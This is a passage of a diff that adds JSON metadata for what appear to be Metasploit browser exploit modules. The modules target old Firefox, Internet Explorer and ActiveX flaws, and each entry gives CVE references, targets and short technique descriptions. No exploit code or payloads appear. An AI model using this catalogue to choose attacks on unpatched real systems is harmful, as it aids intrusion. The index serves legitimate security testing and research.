"Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP - Firefox 8 / 8.0.1", + "Windows XP - Firefox 9", + "Windows XP - Firefox 9.0.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_attribchildremoved", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_firefox_onreadystatechange": { + "name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", + "fullname": "exploit/windows/browser/mozilla_firefox_onreadystatechange", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-25", + "type": "exploit", + "author": [ + "Nils", + "Unknown", + "w3bd3vil", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.", + "references": [ + "CVE-2013-1690", + "OSVDB-94584", + "BID-60778", + "URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", + "URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365", + "URL-http://krash.in/ffn0day.txt", + "URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 17 & Firefox 21 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_firefox_onreadystatechange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_firefox_xmlserializer": { + "name": "Firefox XMLSerializer Use After Free", + "fullname": "exploit/windows/browser/mozilla_firefox_xmlserializer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-08", + "type": "exploit", + "author": [ + "regenrecht", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.", + "references": [ + "CVE-2013-0753", + "OSVDB-89021", + "BID-57209", + "ZDI-13-006", + "URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 17 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_firefox_xmlserializer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_interleaved_write": { + "name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption", + "fullname": "exploit/windows/browser/mozilla_interleaved_write", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-25", + "type": "exploit", + "author": [ + "unknown", + "scriptjunkie" + ], + "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.", + "references": [ + "CVE-2010-3765", + "OSVDB-68905", + "BID-15352", + "EDB-15352", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222", + "URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_interleaved_write", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_mchannel": { + "name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability", + "fullname": "exploit/windows/browser/mozilla_mchannel", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-10", + "type": "exploit", + "author": [ + "regenrecht", + "Rh0", + "mr_me " + ], + "description": "This module exploits a use after free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT Element mChannel can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECTs\n data attribute. (Discovered by regenrecht). This module uses heapspray\n with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,\n a windows 7 target was provided using JAVA 6 and below to avoid aslr.", + "references": [ + "CVE-2011-0065", + "OSVDB-72085", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986", + "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Firefox 3.6.16 on Windows XP SP3", + "Firefox 3.6.16 on Windows 7 + Java" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_mchannel.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_mchannel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_nssvgvalue": { + "name": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability", + "fullname": "exploit/windows/browser/mozilla_nssvgvalue", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-12-06", + "type": "exploit", + "author": [ + "regenrecht", + "Lincoln ", + "corelanc0d3r " + ], + "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\n The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\n uses a loop which can result in an out-of-bounds access to attacker-controlled memory.\n The mObserver ElementAt() function (which picks up pointers), does not validate\n if a given index is out of bound. If a custom observer of nsSVGValue is created,\n which removes elements from the original observer,\n and memory layout is manipulated properly, the ElementAt() function might pick up\n an attacker provided pointer, which can be leveraged to gain remote arbitrary\n code execution.", + "references": [ + "CVE-2011-3658", + "OSVDB-77953", + "ZDI-12-056", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP - Firefox 7", + "Windows XP - Firefox 8 (<= 8.0.1)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_nssvgvalue.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_nssvgvalue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_nstreerange": { + "name": "Mozilla Firefox \"nsTreeRange\" Dangling Pointer Vulnerability", + "fullname": "exploit/windows/browser/mozilla_nstreerange", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-02", + "type": "exploit", + "author": [ + "regenrecht", + "xero" + ], + "description": "This module exploits a code execution vulnerability in Mozilla Firefox\n 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n By overwriting a subfunction of invalidateSelection it is possible to free the\n nsTreeRange object that the function currently operates on.\n Any further operations on the freed object can result in remote code execution.\n Utilizing the call setup the function provides it's possible to bypass DEP\n without the need for a ROP. Sadly this exploit is still either dependent\n on Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n modules anymore.", + "references": [ + "CVE-2011-0073", + "OSVDB-72087", + "BID-47663", + "ZDI-11-157", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919", + "URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", + "Firefox Runtime, fails with ASLR", + "Java Runtime (7.10.3052.4), best against ASLR", + "Java JVM (20.1.0.02)", + "Java Regutils (6.0.260.3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_nstreerange.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_nstreerange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_reduceright": { + "name": "Mozilla Firefox Array.reduceRight() Integer Overflow", + "fullname": "exploit/windows/browser/mozilla_reduceright", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-06-21", + "type": "exploit", + "author": [ + "Chris Rohlf", + "Yan Ivnitskiy", + "Matteo Memelli", + "dookie2000ca", + "sinn3r ", + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a vulnerability found in Mozilla Firefox 3.6. When an\n array object is configured with a large length value, the reduceRight() method\n may cause an invalid index being used, allowing arbitrary remote code execution.\n Please note that the exploit requires a longer amount of time (compare to a\n typical browser exploit) in order to gain control of the machine.", + "references": [ + "CVE-2011-2371", + "OSVDB-73184", + "EDB-17974", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Mozilla Firefox 3.6.16 (no JAVA)", + "Mozilla Firefox 3.6.16 (JAVA)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_reduceright.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_reduceright", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms03_020_ie_objecttype": { + "name": "MS03-020 Microsoft Internet Explorer Object Type", + "fullname": "exploit/windows/browser/ms03_020_ie_objecttype", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-04", + "type": "exploit", + "author": [ + "skape " + ], + "description": "This module exploits a vulnerability in Internet Explorer's\n handling of the OBJECT type attribute.", + "references": [ + "CVE-2003-0344", + "OSVDB-2967", + "BID-7806", + "MSB-MS03-020" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT/XP/2003 Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms03_020_ie_objecttype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms05_054_onload": { + "name": "MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution", + "fullname": "exploit/windows/browser/ms05_054_onload", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-11-21", + "type": "exploit", + "author": [ + "Benjamin Tobias Franz", + "Stuart Pearson", + "Sam Sharps" + ], + "description": "This bug is triggered when the browser handles a JavaScript 'onLoad' handler in\n conjunction with an improperly initialized 'window()' JavaScript function.\n This exploit results in a call to an address lower than the heap. The javascript\n prompt() places our shellcode near where the call operand points to. We call\n prompt() multiple times in separate iframes to place our return address.\n We hide the prompts in a popup window behind the main window. We spray the heap\n a second time with our shellcode and point the return address to the heap. I use\n a fairly high address to make this exploit more reliable. IE will crash when the\n exploit completes. Also, please note that Internet Explorer must allow popups\n in order to continue exploitation.", + "references": [ + "MSB-MS05-054", + "CVE-2005-1790", + "OSVDB-17094", + "BID-13799" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 on Windows XP", + "Internet Explorer 6 Windows 2000" + ], + "mod_time": "2021-04-05 13:03:42 +0000", + "path": "/modules/exploits/windows/browser/ms05_054_onload.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms05_054_onload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_001_wmf_setabortproc": { + "name": "Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution", + "fullname": "exploit/windows/browser/ms06_001_wmf_setabortproc", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-12-27", + "type": "exploit", + "author": [ + "hdm ", + "san ", + "O600KO78RUS " + ], + "description": "This module exploits a vulnerability in the GDI library included with\n Windows XP and 2003. This vulnerability uses the 'Escape' metafile function\n to execute arbitrary code through the SetAbortProc procedure. This module\n generates a random WMF record stream for each request.", + "references": [ + "CVE-2005-4560", + "OSVDB-21987", + "MSB-MS06-001", + "BID-16074", + "URL-http://wvware.sourceforge.net/caolan/ora-wmf.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/2003/Vista Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_001_wmf_setabortproc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_013_createtextrange": { + "name": "MS06-013 Microsoft Internet Explorer createTextRange() Code Execution", + "fullname": "exploit/windows/browser/ms06_013_createtextrange", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-03-19", + "type": "exploit", + "author": [ + "Faithless ", + "Darkeagle ", + "hdm ", + "justfriends4n0w ", + "Unknown" + ], + "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer.\n Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n to a very remote, non-existent memory location. This module is the result of merging three\n different exploit submissions and has only been reliably tested against Windows XP SP2.\n This vulnerability was independently discovered by multiple parties. The heap spray method\n used by this exploit was pioneered by Skylined.", + "references": [ + "CVE-2006-1359", + "OSVDB-24050", + "MSB-MS06-013", + "BID-17196", + "US-CERT-VU-876678", + "URL-http://web.archive.org/web/20060418044756/http://secunia.com:80/secunia_research/2006-7/advisory/", + "URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html", + "URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", + "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_013_createtextrange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_055_vml_method": { + "name": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", + "fullname": "exploit/windows/browser/ms06_055_vml_method", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-09-19", + "type": "exploit", + "author": [ + "hdm ", + "Aviv Raff ", + "Trirat Puttaraksa (Kira) ", + "Mr.Niega ", + "M. Shirk " + ], + "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.", + "references": [ + "CVE-2006-4868", + "OSVDB-28946", + "MSB-MS06-055", + "BID-20096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT 4.0 -> Windows 2003 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_055_vml_method.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_055_vml_method", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_057_webview_setslice": { + "name": "MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow", + "fullname": "exploit/windows/browser/ms06_057_webview_setslice", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-07-17", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a flaw in the WebViewFolderIcon ActiveX control\n included with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n during the Month of Browser Bugs project (MoBB #18).", + "references": [ + "CVE-2006-3730", + "OSVDB-27110", + "MSB-MS06-057", + "BID-19030" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_057_webview_setslice.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_057_webview_setslice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_067_keyframe": { + "name": "MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability", + "fullname": "exploit/windows/browser/ms06_067_keyframe", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-11-14", + "type": "exploit", + "author": [ + "Alexander Sotirov ", + "skape " + ], + "description": "This module exploits a heap overflow vulnerability in the KeyFrame method of the\n direct animation ActiveX control. This is a port of the exploit implemented by\n Alexander Sotirov.", + "references": [ + "CVE-2006-4777", + "OSVDB-28842", + "BID-20047", + "MSB-MS06-067" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000/XP/2003 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_067_keyframe.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_067_keyframe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms06_071_xml_core": { + "name": "MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling", + "fullname": "exploit/windows/browser/ms06_071_xml_core", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-10-10", + "type": "exploit", + "author": [ + "Trirat Puttaraksa " + ], + "description": "This module exploits a code execution vulnerability in Microsoft XML Core Services which\n exists in the XMLHTTP ActiveX control. This module is the modified version of\n http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n + Microsoft XML Core Services 4.0 SP2.", + "references": [ + "CVE-2006-5745", + "OSVDB-29425", + "MSB-MS06-071", + "BID-20915" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 -> Windows 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms06_071_xml_core.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms06_071_xml_core", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms07_017_ani_loadimage_chunksize": { + "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)", + "fullname": "exploit/windows/browser/ms07_017_ani_loadimage_chunksize", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-28", + "type": "exploit", + "author": [ + "hdm ", + "skape ", + "Solar Eclipse " + ], + "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function in USER32.dll. The flaw can be triggered through\n Internet Explorer 6 and 7 by using the CURSOR style sheet directive\n to load a malicious .ANI file. The module can also exploit Mozilla\n Firefox by using a UNC path in a moz-icon URL and serving the .ANI file\n over WebDAV. The vulnerable code in USER32.dll will catch any\n exceptions that occur while the invalid cursor is loaded, causing the\n exploit to silently fail when the wrong target has been chosen.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", + "references": [ + "CVE-2007-0038", + "OSVDB-33629", + "BID-23194", + "MSB-MS07-017" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", + "IE6 on Windows NT, 2000, XP, 2003 (all languages)", + "IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)", + "IE7 and Firefox on Windows Vista (all languages)", + "Firefox on Windows XP (English)", + "Firefox on Windows 2003 (English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_041_snapshotviewer": { + "name": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", + "fullname": "exploit/windows/browser/ms08_041_snapshotviewer", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-07-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Microsoft Office Snapshot Viewer ActiveX Control.", + "references": [ + "CVE-2008-2463", + "OSVDB-46749", + "MSB-MS08-041", + "BID-30114" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_041_snapshotviewer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_053_mediaencoder": { + "name": "Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/ms08_053_mediaencoder", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-09-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Windows Media Encoder 9. When\n sending an overly long string to the GetDetailsString() method of wmex.dll\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-3008", + "OSVDB-47962", + "BID-31065", + "MSB-MS08-053" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_053_mediaencoder.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_053_mediaencoder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_070_visual_studio_msmask": { + "name": "Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/ms08_070_visual_studio_msmask", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-13", + "type": "exploit", + "author": [ + "koshi", + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n When passing a specially crafted string to the Mask parameter of the\n Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2008-3704", + "OSVDB-47475", + "BID-30674", + "MSB-MS08-070" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 IE 6.0 SP0-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_070_visual_studio_msmask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms08_078_xml_corruption": { + "name": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", + "fullname": "exploit/windows/browser/ms08_078_xml_corruption", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-12-07", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.", + "references": [ + "CVE-2008-4844", + "OSVDB-50622", + "BID-32721", + "MSB-MS08-078", + "URL-https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms08_078_xml_corruption", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_002_memory_corruption": { + "name": "MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption", + "fullname": "exploit/windows/browser/ms09_002_memory_corruption", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-10", + "type": "exploit", + "author": [ + "dean " + ], + "description": "This module exploits an error related to the CFunctionPointer function when attempting\n to access uninitialized memory. A remote attacker could exploit this vulnerability to\n corrupt memory and execute arbitrary code on the system with the privileges of the victim.", + "references": [ + "CVE-2009-0075", + "OSVDB-51839", + "MSB-MS09-002" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_002_memory_corruption.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_002_memory_corruption", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_043_owc_htmlurl": { + "name": "Microsoft OWC Spreadsheet HTMLURL Buffer Overflow", + "fullname": "exploit/windows/browser/ms09_043_owc_htmlurl", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-11", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a buffer overflow in Microsoft's Office Web Components.\n When passing an overly long string as the \"HTMLURL\" parameter an attacker can\n execute arbitrary code.", + "references": [ + "CVE-2009-1534", + "OSVDB-56916", + "BID-35992", + "MSB-MS09-043", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - IE6 - Office XP SP0", + "Windows XP SP3 - IE6 - Office XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_043_owc_htmlurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_043_owc_msdso": { + "name": "Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption", + "fullname": "exploit/windows/browser/ms09_043_owc_msdso", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-13", + "type": "exploit", + "author": [ + "unknown", + "hdm ", + "Ahmed Obied", + "DSR! " + ], + "description": "This module exploits a memory corruption vulnerability within versions 10 and 11 of\n the Office Web Component Spreadsheet ActiveX control. This module was based on\n an exploit found in the wild.", + "references": [ + "CVE-2009-1136", + "OSVDB-55806", + "MSB-MS09-043", + "URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py", + "EDB-9163", + "URL-https://web.archive.org/web/20090716143635/http://xeye.us/blog/2009/07/one-0day/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms09_043_owc_msdso", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms09_072_style_object": { + "name": "MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption", + "fullname": "exploit/windows/browser/ms09_072_style_object", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-11-20", + 